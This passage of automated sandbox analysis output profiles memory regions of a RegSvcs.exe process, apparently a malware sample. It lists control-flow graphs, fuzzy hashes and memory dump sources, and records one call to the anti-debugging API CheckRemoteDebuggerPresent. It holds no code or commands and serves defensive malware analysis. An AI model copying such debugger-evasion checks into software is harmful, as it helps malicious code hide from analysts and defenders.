                                                                                                                            • Snapshot File: hcaresult_5_2_68a0000_RegSvcs.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: PH]q$PH]q$PH]q$w[r
                                                                                                                            • API String ID: 0-3187754680
                                                                                                                            • Opcode ID: 68c2bb37beda84113a275067086aaa3eb8cec9bdaef7f44238d2339b959123e2
                                                                                                                            • Instruction ID: 5f55300168683552d0a67d564924e9af3ba3282ec5e814019ea4e7967af2ee93
                                                                                                                            • Opcode Fuzzy Hash: 68c2bb37beda84113a275067086aaa3eb8cec9bdaef7f44238d2339b959123e2
                                                                                                                            • Instruction Fuzzy Hash: 24B1C230B44349EFFB949F64C952B7E76A2EB84704F248025EF06EB394DA749C42CB91
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Control-flow Graph

                                                                                                                            • Executed
                                                                                                                            • Not Executed
                                                                                                                            control_flow_graph 1630 6700f48-6700f7a 1631 6700f7f-6700f82 1630->1631 1632 6700f84 1631->1632 1633 6700f8b-6700f94 1631->1633 1632->1633 1634 6700ff3-6700ff8 1632->1634 1635 67011b5-67011c9 1632->1635 1636 67010b7-67010be 1632->1636 1637 6700fb8-6700fc7 1632->1637 1638 6700ffa 1632->1638 1639 670113a-670113f 1632->1639 1640 6700fe0-6700fe3 1632->1640 1641 6701141-670118d 1632->1641 1642 6700fa6-6700fa8 1632->1642 1643 670106a-67010ab 1632->1643 1644 670100b-6701015 1632->1644 1645 67010ad-67010b2 1632->1645 1646 67011ca-67011cf 1633->1646 1647 6700f9a-6700fa4 1633->1647 1634->1631 1652 67010d0 1636->1652 1653 67010c0-67010ce 1636->1653 1637->1646 1648 6700fcd-6700fd6 1637->1648 1651 6700fff-6701002 1638->1651 1639->1635 1649 6700fe5 1640->1649 1650 6700fec-6700ff1 1640->1650 1641->1635 1654 6700fb1-6700fb6 1642->1654 1655 6700faa 1642->1655 1643->1645 1691 670101a call 67715f5 1644->1691 1692 670101a call 6771ab0 1644->1692 1693 670101a call 6771940 1644->1693 1694 670101a call 6770e4f 1644->1694 1695 670101a call 677192f 1644->1695 1696 670101a call 677011e 1644->1696 1697 670101a call 6771aee 1644->1697 1698 670101a call 6770149 1644->1698 1699 670101a call 67717e9 1644->1699 1645->1651 1647->1631 1658 6700fd8 1648->1658 1659 6700fdb-6700fde 1648->1659 1661 6700fea 1649->1661 1650->1661 1651->1644 1662 6701004 1651->1662 1666 67010d2-67010d4 1652->1666 1653->1666 1656 6700faf 1654->1656 1655->1656 1656->1631 1658->1659 1659->1631 1661->1631 1662->1635 1662->1636 1662->1639 1662->1641 1662->1643 1662->1644 1662->1645 1663 670101f-6701056 1681 670118f-67011ad 1663->1681 1682 670105c-6701068 1663->1682 1667 67010f0 1666->1667 1668 67010d6-67010dc 1666->1668 1671 67010f2-67010f9 1667->1671 1669 67010e2-67010e4 1668->1669 1670 67010de-67010e0 1668->1670 1675 67010ee 1669->1675 1670->1675 1676 6701102-670110d 1671->1676 1675->1671 1680 6701113-6701120 1676->1680 1676->1681 1680->1681 1683 6701122-6701127 1680->1683 1681->1635 1682->1651 1685 6701133-6701138 1683->1685 1686 6701129 1683->1686 1688 670112e 1685->1688 1686->1688 1688->1651 1691->1663 1692->1663 1693->1663 1694->1663 1695->1663 1696->1663 1697->1663 1698->1663 1699->1663
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000005.00000002.3307649124.0000000006700000.00000040.00000800.00020000.00000000.sdmp, Offset: 06700000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_5_2_6700000_RegSvcs.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: $]q$$]q$$]q$[r
                                                                                                                            • API String ID: 0-4217983697
                                                                                                                            • Opcode ID: 443e11901054ca4bb76367eed368eb4afad056cdff855e047d612dd306274836
                                                                                                                            • Instruction ID: b1d659a913720b1e285735ceefe5c165bc23a81dc0b480eaddfdd0fa3bee8260
                                                                                                                            • Opcode Fuzzy Hash: 443e11901054ca4bb76367eed368eb4afad056cdff855e047d612dd306274836
                                                                                                                            • Instruction Fuzzy Hash: A151A130B44104DFF7989BA8D844BBD76E7EB94310F54C03AE50AAB3C5DA759C418BA1
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Control-flow Graph

                                                                                                                            • Executed
                                                                                                                            • Not Executed
                                                                                                                            control_flow_graph 1700 6700f39-6700f3a 1701 6700f42-6700f44 1700->1701 1702 6700f3c-6700f3e 1700->1702 1704 6700f46-6700f7a 1701->1704 1703 6700f40 1702->1703 1702->1704 1703->1701 1707 6700f7f-6700f82 1704->1707 1708 6700f84 1707->1708 1709 6700f8b-6700f94 1707->1709 1708->1709 1710 6700ff3-6700ff8 1708->1710 1711 67011b5-67011c9 1708->1711 1712 67010b7-67010be 1708->1712 1713 6700fb8-6700fc7 1708->1713 1714 6700ffa 1708->1714 1715 670113a-670113f 1708->1715 1716 6700fe0-6700fe3 1708->1716 1717 6701141-670118d 1708->1717 1718 6700fa6-6700fa8 1708->1718 1719 670106a-67010ab 1708->1719 1720 670100b-6701015 1708->1720 1721 67010ad-67010b2 1708->1721 1722 67011ca-67011cf 1709->1722 1723 6700f9a-6700fa4 1709->1723 1710->1707 1728 67010d0 1712->1728 1729 67010c0-67010ce 1712->1729 1713->1722 1724 6700fcd-6700fd6 1713->1724 1727 6700fff-6701002 1714->1727 1715->1711 1725 6700fe5 1716->1725 1726 6700fec-6700ff1 1716->1726 1717->1711 1730 6700fb1-6700fb6 1718->1730 1731 6700faa 1718->1731 1719->1721 1767 670101a call 67715f5 1720->1767 1768 670101a call 6771ab0 1720->1768 1769 670101a call 6771940 1720->1769 1770 670101a call 6770e4f 1720->1770 1771 670101a call 677192f 1720->1771 1772 670101a call 677011e 1720->1772 1773 670101a call 6771aee 1720->1773 1774 670101a call 6770149 1720->1774 1775 670101a call 67717e9 1720->1775 1721->1727 1723->1707 1734 6700fd8 1724->1734 1735 6700fdb-6700fde 1724->1735 1737 6700fea 1725->1737 1726->1737 1727->1720 1738 6701004 1727->1738 1742 67010d2-67010d4 1728->1742 1729->1742 1732 6700faf 1730->1732 1731->1732 1732->1707 1734->1735 1735->1707 1737->1707 1738->1711 1738->1712 1738->1715 1738->1717 1738->1719 1738->1720 1738->1721 1739 670101f-6701056 1757 670118f-67011ad 1739->1757 1758 670105c-6701068 1739->1758 1743 67010f0 1742->1743 1744 67010d6-67010dc 1742->1744 1747 67010f2-67010f9 1743->1747 1745 67010e2-67010e4 1744->1745 1746 67010de-67010e0 1744->1746 1751 67010ee 1745->1751 1746->1751 1752 6701102-670110d 1747->1752 1751->1747 1756 6701113-6701120 1752->1756 1752->1757 1756->1757 1759 6701122-6701127 1756->1759 1757->1711 1758->1727 1761 6701133-6701138 1759->1761 1762 6701129 1759->1762 1764 670112e 1761->1764 1762->1764 1764->1727 1767->1739 1768->1739 1769->1739 1770->1739 1771->1739 1772->1739 1773->1739 1774->1739 1775->1739
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000005.00000002.3307649124.0000000006700000.00000040.00000800.00020000.00000000.sdmp, Offset: 06700000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_5_2_6700000_RegSvcs.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: $]q$$]q$[r
                                                                                                                            • API String ID: 0-377108751
                                                                                                                            • Opcode ID: 4cf494f9e09bb60f79f53dc1b39de31684049bf25712cc301b1e9b3370c00087
                                                                                                                            • Instruction ID: c6731c555932aba0da14506fbc7491f608204e7ec1d9aecff9ac200aca97259b
                                                                                                                            • Opcode Fuzzy Hash: 4cf494f9e09bb60f79f53dc1b39de31684049bf25712cc301b1e9b3370c00087
                                                                                                                            • Instruction Fuzzy Hash: B251A030F44144DFFB949BA8D844BB9B6E7EB94311F54C03AE50AAB3C1DA74AC418BA5
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Control-flow Graph

                                                                                                                            • Executed
                                                                                                                            • Not Executed
                                                                                                                            control_flow_graph 1776 a790b8-a790d3 1777 a790d8-a790db 1776->1777 1778 a790e1 1777->1778 1779 a79400-a79408 1777->1779 1778->1779 1780 a79326-a79328 1778->1780 1781 a793c6-a793cb 1778->1781 1782 a79385-a7939b 1778->1782 1783 a792e5-a792e7 1778->1783 1784 a793cd-a793e1 1778->1784 1785 a790e8-a790eb 1778->1785 1786 a79377-a79379 1778->1786 1787 a790f6-a790fb 1778->1787 1788 a79275-a79285 1778->1788 1789 a793f4 1778->1789 1790 a793d4-a793d9 1778->1790 1791 a79152-a79171 call a7995c 1778->1791 1792 a791d2-a791fa 1778->1792 1793 a791fc-a791ff 1778->1793 1794 a7923b-a7924b 1778->1794 1795 a793db-a793dd 1778->1795 1796 a792da-a792e0 1778->1796 1797 a7925a-a7926a 1778->1797 1798 a793f6-a793fe 1779->1798 1816 a792a4-a792a6 1780->1816 1817 a79100-a79103 1780->1817 1809 a793e6-a793e9 1781->1809 1782->1777 1807 a793a1-a793a3 1782->1807 1804 a79305 1783->1804 1805 a792e9-a792ef 1783->1805 1784->1809 1801 a790f1-a7942c 1785->1801 1802 a7937b-a79380 1785->1802 1786->1790 1787->1793 1788->1780 1789->1798 1790->1809 1840 a79177-a7917f 1791->1840 1837 a7918b-a7918f 1792->1837 1793->1791 1808 a79205 1793->1808 1833 a79251-a79255 1794->1833 1834 a79368-a79372 1794->1834 1799 a793df-a7941c 1795->1799 1800 a793ac-a793b6 1795->1800 1796->1793 1827 a79181-a79186 1797->1827 1828 a79270-a7935c 1797->1828 1798->1809 1824 a79433-a794aa 1799->1824 1830 a7941e-a79425 1799->1830 1800->1824 1825 a793b8-a793c4 1800->1825 1823 a79431 1801->1823 1802->1782 1802->1823 1819 a79307-a79324 1804->1819 1820 a792f5-a79301 1805->1820 1821 a792f1-a792f3 1805->1821 1807->1777 1808->1780 1808->1781 1808->1783 1808->1784 1808->1785 1808->1786 1808->1787 1808->1788 1808->1789 1808->1790 1808->1791 1808->1792 1808->1794 1808->1795 1808->1796 1808->1797 1809->1786 1813 a793eb 1809->1813 1813->1781 1813->1784 1813->1785 1813->1786 1813->1787 1813->1790 1813->1795 1816->1817 1817->1793 1829 a79109 1817->1829 1819->1796 1831 a79303 1820->1831 1821->1831 1823->1809 1825->1781 1832 a7942a 1825->1832 1836 a79361-a79363 1827->1836 1827->1837 1828->1836 1829->1780 1829->1781 1829->1783 1829->1784 1829->1785 1829->1786 1829->1787 1829->1788 1829->1789 1829->1790 1829->1791 1829->1792 1829->1793 1829->1794 1829->1795 1829->1796 1829->1797 1830->1832 1831->1819 1832->1809 1834->1786 1834->1789 1836->1793 1843 a791b2 1837->1843 1844 a79191-a7919a 1837->1844 1840->1793 1846 a791b5-a791bf 1843->1846 1847 a791a1-a791ae 1844->1847 1848 a7919c-a7919f 1844->1848 1853 a791ca-a792b5 1846->1853 1850 a791b0 1847->1850 1848->1850 1850->1846 1853->1834 1855 a792bb-a792c9 1853->1855 1855->1834 1856 a792cf-a792d5 1855->1856 1856->1793
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000005.00000002.3243730276.0000000000A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A70000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_5_2_a70000_RegSvcs.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: $]q$$]q
                                                                                                                            • API String ID: 0-127220927
                                                                                                                            • Opcode ID: 94f85bbd31796471caec81a5a00876ebadecf5b6bb54410d2e5f48b8d3163c55
                                                                                                                            • Instruction ID: 6e8f1d1ade75b4902fb993013def35aaf22fad0d03e78b9813cc355d4a3d600c
                                                                                                                            • Opcode Fuzzy Hash: 94f85bbd31796471caec81a5a00876ebadecf5b6bb54410d2e5f48b8d3163c55
                                                                                                                            • Instruction Fuzzy Hash: 0A91D13464A145DFD7058B78CDA96AF7BB2BB45300F64C1BBD80A9B6C2C7348887DB52
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Control-flow Graph

                                                                                                                            • Executed
                                                                                                                            • Not Executed
                                                                                                                            control_flow_graph 2014 67a4c8d-67a4c91 2015 67a4c93-67a4ca5 2014->2015 2016 67a4ca7 2014->2016 2017 67a4caa-67a4cc7 2015->2017 2016->2017 2019 67a4cca-67a4cce 2017->2019 2020 67a4ceb-67a4cf5 2019->2020 2021 67a4cd0 2019->2021 2022 67a4cda-67a4ce6 2020->2022 2021->2022 2023 67a5fc8-67a5fde 2022->2023 2024 67a4a66-67a4a6f 2022->2024 2025 67a4a78-67a4a7c 2024->2025 2026 67a4a71 2024->2026 2027 67a4a7e-67a4a87 2025->2027 2028 67a4a9d 2025->2028 2029 67a48bc-67a48cb 2026->2029 2030 67a49b3-67a49cc 2026->2030 2031 67a4871-67a48a8 call 67a44d8 2026->2031 2032 67a4e16-67a4e25 2026->2032 2034 67a4a89-67a4a8c 2027->2034 2035 67a4a8e-67a4a91 2027->2035 2038 67a4aa0-67a4aa2 2028->2038 2050 67a48cd-67a48da 2029->2050 2051 67a4903-67a4910 2029->2051 2053 67a5d7b-67a5d80 2030->2053 2054 67a49d2-67a49d6 2030->2054 2060 67a48ad-67a48ba 2031->2060 2036 67a4e2b-67a4ee5 2032->2036 2037 67a5c11-67a5c1e 2032->2037 2040 67a4a9b 2034->2040 2035->2040 2046 67a5c41 2036->2046 2140 67a4eeb-67a4ef5 2036->2140 2045 67a5c20-67a5c2a 2037->2045 2037->2046 2043 67a4acf-67a4ad9 2038->2043 2044 67a4aa4-67a4aae 2038->2044 2040->2038 2043->2046 2047 67a4adf-67a4ae9 2043->2047 2044->2046 2055 67a4ab4-67a4abb 2044->2055 2056 67a5bc7-67a5bca 2045->2056 2048 67a5c46-67a5c48 2046->2048 2047->2019 2058 67a4ac1-67a4acd 2047->2058 2057 67a5c4e-67a5c57 2048->2057 2050->2053 2063 67a48e0-67a48ec 2050->2063 2051->2053 2059 67a4916-67a4928 2051->2059 2071 67a5d8b-67a5d9e 2053->2071 2064 67a49dc-67a49e0 2054->2064 2055->2058 2061 67a5bcc 2056->2061 2062 67a5bd3-67a5bd8 2056->2062 2065 67a5c59 2057->2065 2066 67a5c60-67a5c64 2057->2066 2058->2024 2067 67a492a-67a493d 2059->2067 2068 67a48f2-67a48fe 2059->2068 2069 67a485f-67a4868 2060->2069 2061->2062 2061->2066 2070 67a5bda-67a5be0 2061->2070 2061->2071 2072 67a5bf8-67a5c00 2061->2072 2073 67a5d3e-67a5d4e 2061->2073 2074 67a5c2c-67a5c3f 2061->2074 2075 67a5c02-67a5c0b 2061->2075 2076 67a5ce0-67a5cf9 2061->2076 2077 67a5d50-67a5d69 2061->2077 2078 67a5d04 2061->2078 2062->2056 2063->2068 2081 67a49e2-67a49eb 2064->2081 2082 67a4a01 2064->2082 2065->2066 2065->2071 2065->2073 2065->2076 2065->2077 2065->2078 2084 67a5c66-67a5c6f 2066->2084 2085 67a5c85 2066->2085 2067->2023 2068->2069 2069->2031 2083 67a486a 2069->2083 2088 67a505d 2070->2088 2089 67a5be6-67a5bf0 2070->2089 2107 67a5da0 2071->2107 2108 67a5da7-67a5dba 2071->2108 2072->2056 2087 67a5d11-67a5d1a 2073->2087 2074->2048 2075->2036 2075->2037 2076->2078 2077->2030 2117 67a5d6f-67a5d79 2077->2117 2078->2087 2091 67a49ed-67a49f0 2081->2091 2092 67a49f2-67a49f5 2081->2092 2086 67a4a04-67a4a11 2082->2086 2083->2031 2083->2064 2083->2067 2093 67a4942-67a4946 2083->2093 2096 67a5c71-67a5c74 2084->2096 2097 67a5c76-67a5c79 2084->2097 2105 67a5c88-67a5c8a 2085->2105 2094 67a4a2d 2086->2094 2095 67a4a13-67a4a2b 2086->2095 2087->2073 2103 67a5d1c 2087->2103 2098 67a5062-67a5065 2088->2098 2089->2046 2106 67a5bf2-67a5bf6 2089->2106 2102 67a49ff 2091->2102 2092->2102 2115 67a4948-67a4951 2093->2115 2116 67a4967 2093->2116 2109 67a4a33-67a4a5c call 67a44d8 2094->2109 2095->2109 2110 67a5c83 2096->2110 2097->2110 2111 67a506e-67a50b0 2098->2111 2112 67a5067 2098->2112 2102->2086 2103->2071 2103->2073 2103->2077 2113 67a5cbf-67a5cc9 2105->2113 2114 67a5c8c-67a5c99 2105->2114 2106->2056 2107->2023 2107->2062 2107->2066 2107->2070 2107->2071 2107->2072 2107->2073 2107->2074 2107->2075 2107->2076 2107->2077 2107->2078 2108->2023 2109->2024 2110->2105 2146 67a50b9-67a50be 2111->2146 2147 67a50b2 2111->2147 2112->2019 2112->2111 2119 67a4efa-67a4f84 2112->2119 2120 67a4d5c-67a4d8f 2112->2120 2121 67a5012-67a501c 2112->2121 2113->2053 2127 67a5ccf-67a5cde 2113->2127 2114->2053 2122 67a5c9f-67a5cab 2114->2122 2125 67a4958-67a495b 2115->2125 2126 67a4953-67a4956 2115->2126 2123 67a496a-67a49ad 2116->2123 2117->2087 2119->2046 2152 67a4f8a-67a4f9c 2119->2152 2120->2046 2144 67a4d95-67a4da4 2120->2144 2121->2072 2129 67a5022-67a502f 2121->2129 2132 67a5cb1-67a5cbd 2122->2132 2123->2030 2123->2117 2131 67a4965 2125->2131 2126->2131 2127->2076 2127->2132 2129->2046 2134 67a5035-67a5047 2129->2134 2131->2123 2132->2057 2134->2024 2140->2024 2144->2024 2144->2036 2146->2056 2149 67a50b7 2146->2149 2147->2149 2149->2098 2152->2024
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000005.00000002.3311321613.00000000067A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067A0000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_5_2_67a0000_RegSvcs.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: `Q]q$$]q
                                                                                                                            • API String ID: 0-945736792
                                                                                                                            • Opcode ID: 21557298d60a85fcf1c725e2bf8b58905c8ea09aa46525638a524849414e4348
                                                                                                                            • Instruction ID: 46431bb71ebd13f5714f5d214e3ec5918592685f63fed3205c997b1bf01993c1
                                                                                                                            • Opcode Fuzzy Hash: 21557298d60a85fcf1c725e2bf8b58905c8ea09aa46525638a524849414e4348
                                                                                                                            • Instruction Fuzzy Hash: E8511730E00228DFEBA4CF54C984BEDB7F2BB84300F1486A9D549AB298D7719E80CF51
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Control-flow Graph

                                                                                                                            • Executed
                                                                                                                            • Not Executed
                                                                                                                            control_flow_graph 2153 67a2dfd-67a2e47 2156 67a2e53-67a2e6e 2153->2156 2158 67a4357-67a4375 2156->2158 2159 67a2e74-67a2e7e 2156->2159 2162 67a4396 2158->2162 2163 67a4377-67a4380 2158->2163 2159->2158 2166 67a4399-67a439f 2162->2166 2164 67a4382-67a4385 2163->2164 2165 67a4387-67a438a 2163->2165 2167 67a4394 2164->2167 2165->2167 2167->2166
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000005.00000002.3311321613.00000000067A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067A0000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_5_2_67a0000_RegSvcs.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: .5uq$.]r
                                                                                                                            • API String ID: 0-2194674112
                                                                                                                            • Opcode ID: 1ffa34dc42a9d7a0b69093399bcb9668cd1f14a14e165914510d575f245e88fc
                                                                                                                            • Instruction ID: 9d40685002f67ffc1ef56de88e7204ea2d88f07528e1d3163e0fa9d7c8276d70
                                                                                                                            • Opcode Fuzzy Hash: 1ffa34dc42a9d7a0b69093399bcb9668cd1f14a14e165914510d575f245e88fc
                                                                                                                            • Instruction Fuzzy Hash: B9118E30E002188FDB50CB64C954BEDBBF2EF88301F248195E449BB255CB719E80CF51
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000005.00000002.3310908949.0000000006790000.00000040.00000800.00020000.00000000.sdmp, Offset: 06790000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_5_2_6790000_RegSvcs.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: $]q$$]q
                                                                                                                            • API String ID: 0-127220927
                                                                                                                            • Opcode ID: b704fc3fabd7d88c12d45e7715045df7b0980ef9208d27c380574058e5e4795a
                                                                                                                            • Instruction ID: 0dd67d4df68d12cc10d7c16d0e27db24a92a4a67ffa814963b309d29ad67eed9
                                                                                                                            • Opcode Fuzzy Hash: b704fc3fabd7d88c12d45e7715045df7b0980ef9208d27c380574058e5e4795a
                                                                                                                            • Instruction Fuzzy Hash: ECF09030E80548DFDF98DB98E844BBD73F2BB01711F14C052E5656B2A9CB389C01CBA0
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000005.00000002.3311321613.00000000067A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067A0000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_5_2_67a0000_RegSvcs.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: .5uq$aOW
                                                                                                                            • API String ID: 0-3017703097
                                                                                                                            • Opcode ID: 35cc3c2af1d9c5a42f2b56e8909702282da86d11603ae19d27fb0db2f4ffaeb9
                                                                                                                            • Instruction ID: c5528f40762c9ccd8c9809d44f83297ab444944155ae4ae002839a99d3168136
                                                                                                                            • Opcode Fuzzy Hash: 35cc3c2af1d9c5a42f2b56e8909702282da86d11603ae19d27fb0db2f4ffaeb9
                                                                                                                            • Instruction Fuzzy Hash: 9FF082B0A40218DFE760CB50CD51BED77B2BB88700F20C199A58D6B395CAB45D80CF40
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000005.00000002.3311321613.00000000067A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067A0000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_5_2_67a0000_RegSvcs.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: .5uq$kO)
                                                                                                                            • API String ID: 0-1004324481
                                                                                                                            • Opcode ID: a8ccd096e522fbd084656f278f7af44cbd97f195877bbab5ef7cfd212ad7f7e5
                                                                                                                            • Instruction ID: 7cc98ad1ca1489e4b08dd62779c5d3b5e056a35aba6c5d39f3b36901e288ad29
                                                                                                                            • Opcode Fuzzy Hash: a8ccd096e522fbd084656f278f7af44cbd97f195877bbab5ef7cfd212ad7f7e5
                                                                                                                            • Instruction Fuzzy Hash: 9FF05E70F403189FEB64CF50CD82BEAB676BB88700F104099A509A7289CAB05E81CF91
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000005.00000002.3311321613.00000000067A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067A0000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_5_2_67a0000_RegSvcs.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: $]q
                                                                                                                            • API String ID: 0-1007455737
                                                                                                                            • Opcode ID: 507f151fd768e3ae04b0cc984bd3866f31f538af47b874418e78f1392a6a5b7e
                                                                                                                            • Instruction ID: 356b1a84b9b3b4f74429d77e370c039f54b88fcd8a3bd48eec97111a23096b2e
                                                                                                                            • Opcode Fuzzy Hash: 507f151fd768e3ae04b0cc984bd3866f31f538af47b874418e78f1392a6a5b7e
                                                                                                                            • Instruction Fuzzy Hash: 49121B70D00229CFEBA4CF68C944BEDB7B2BF84301F1486A6D559AB295D7709E80CF51
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            APIs
                                                                                                                            • CheckRemoteDebuggerPresent.KERNELBASE(?,?), ref: 04D3A727
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000005.00000002.3298316044.0000000004D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D30000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_5_2_4d30000_RegSvcs.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: CheckDebuggerPresentRemote
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 3662101638-0
                                                                                                                            • Opcode ID: bec2476a113151f73b9c195f108ed1156167d7626c7bba21788bf2f7a2bd8068
                                                                                                                            • Instruction ID: dc04c9cf4b85b724559e5e64461cbf6fb5062b7dc39dbd436bc5903c2ac3c810
                                                                                                                            • Opcode Fuzzy Hash: bec2476a113151f73b9c195f108ed1156167d7626c7bba21788bf2f7a2bd8068
                                                                                                                            • Instruction Fuzzy Hash: 712136B19002598FDB10CF9AD484BEEBBF4FF49320F14841AE859A7350C738A944CFA1
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000005.00000002.3311321613.00000000067A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067A0000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_5_2_67a0000_RegSvcs.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: $]q
                                                                                                                            • API String ID: 0-1007455737
                                                                                                                            • Opcode ID: e37bffd16dd76fd27de1e499620fa979bbd5fe850d17cea480bfb3d31eb4f897
                                                                                                                            • Instruction ID: 3a80d86059144b4223ebfd87418c986db288104bd9e08d74d34bcca6ee110dd1
                                                                                                                            • Opcode Fuzzy Hash: e37bffd16dd76fd27de1e499620fa979bbd5fe850d17cea480bfb3d31eb4f897
                                                                                                                            • Instruction Fuzzy Hash: 5CC11A70D00229CFEBA4CF58C984BADB7F2BB84301F1486E6D51AAB295D7709E80CF55
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000005.00000002.3311321613.00000000067A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067A0000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_5_2_67a0000_RegSvcs.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: $]q
                                                                                                                            • API String ID: 0-1007455737
                                                                                                                            • Opcode ID: 1ebf83a77452db1d6117ec465a36b189b0bfef5213a4442d4445023801eaa9fc
                                                                                                                            • Instruction ID: 3b1740607b6583fee0ccd5c80923efc1451f4c95f894bf66f4d50c5db7545b69
                                                                                                                            • Opcode Fuzzy Hash: 1ebf83a77452db1d6117ec465a36b189b0bfef5213a4442d4445023801eaa9fc
                                                                                                                            • Instruction Fuzzy Hash: 72B11830E00229CFEBA4CF58C984BADB7B2BF84301F148696D519AB295D7709E81CF51
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000005.00000002.3311321613.00000000067A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067A0000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_5_2_67a0000_RegSvcs.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: $]q
                                                                                                                            • API String ID: 0-1007455737
                                                                                                                            • Opcode ID: 4ef8847c01e96ea30539e837beafc0e9f23faf55bf8cf0b5c9ad01d5e6fa2e0c
                                                                                                                            • Instruction ID: ee6a14e1b4625a4924d2aa1dc8c3bc66da79fefc0b5915db3916d603fee283d0
                                                                                                                            • Opcode Fuzzy Hash: 4ef8847c01e96ea30539e837beafc0e9f23faf55bf8cf0b5c9ad01d5e6fa2e0c
                                                                                                                            • Instruction Fuzzy Hash: E2910870900229DFEBA4DF64C944BEDB7F2BB88300F1482A9D549A7295D7709E80CF55
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000005.00000002.3243730276.0000000000A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A70000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_5_2_a70000_RegSvcs.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: $]q
                                                                                                                            • API String ID: 0-1007455737
                                                                                                                            • Opcode ID: 0e28fc1df1d36a374aa0c67c1fc7b8922001f2df06a19f8d426e380117f5c383
                                                                                                                            • Instruction ID: 3ac0681d0e5439f4eccc40c9078505236066509d8fb0d30354c30b73d9c0c816
